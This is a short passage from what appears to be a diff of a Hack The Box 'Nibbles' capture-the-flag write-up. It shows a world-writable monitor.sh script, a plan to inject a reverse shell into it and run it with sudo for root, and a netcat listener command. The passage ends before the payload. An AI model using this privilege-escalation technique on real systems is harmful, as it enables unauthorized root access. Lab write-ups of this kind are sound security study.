Vorkharium/vorkharium.github.io/_posts/2024-11-04-HTB-Nibbles-Write-up.md

 drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
 -rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
 ```
+We will abuse this to write a reverse shell into the monitor.sh that connects to our nc listener when running monitor.sh as sudo.

+### Writing reverse shell into monitor.sh and getting shell as root

 Let's start a nc listener on Kali first:
 ```shell
 nc -lvnp 8080